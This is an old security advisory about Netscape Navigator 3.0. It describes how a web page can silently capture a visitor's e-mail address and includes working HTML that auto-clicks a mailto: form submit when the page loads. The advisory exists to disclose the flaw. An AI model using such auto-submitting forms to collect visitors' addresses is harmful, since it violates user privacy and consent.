COMMAND

    Netscape

SYSTEMS AFFECTED

    Systems running Netscape Navigator 3.0

PROBLEM

    With Netscape Navigator 3.0, it is possible to grab  automatically
    and  silently  the  e-mail  addresses  of  each client coming to a
    page.

    It was already known that when a form is submitted with:

	method="get", enctype="text/plain" and action="mailto:..",

    no warning dialog box is shown.

    The next step is to  submit automatically the form.   But Netscape
    put  some  security  restrictions:   Javascript  usually allows to
    automatically submit  a form  with the  submit() method,  but this
    doesn't work when the action contain a mailto: url.  However,  you
    can  emulate  a  mouse  click  on  the  submit button with another
    method:  click()...

    Here's a working HTML code:

	<HTML>
	<HEAD>
	<TITLE>How to grab an e-mail address
	</TITLE>
	</HEAD>
	<BODY onload= "document.forms[0].elements[1].click()">
	<FORM method= get
	       enctype="text/plain"
	       action= "mailto:henri.torgemane@etu.utc.fr?subject=Big bug">
	<INPUT  type=   "hidden"
		 name=   "It's time to upgrade to "
		 value=  "> Netscape 3.01">
	<INPUT  type=   submit
		 value=  "">
	</FORM>
	</BODY>
	</HTML>

    The only unusual  line is the  <BODY> line:  the onload parameter
    tell  to  the  navigator  to  execute  the javascript command that
    follows.  You should change the mailto: url with your own address.

    document.forms[0].elements[1].click()
    tells the browser to emulate a click on the second element of  the
    first form  of the  current document.   (the first  element is  an
    hidden tag, the second is the submit button)

    This was tested only  on Netscape 3.0 for  AIX.  It's very  likely
    to work on any other versions of Netscape 3.0 I don't know how  it
    works with Netscape 3.01...   This discovery is Henry  Torgemane's
    credit.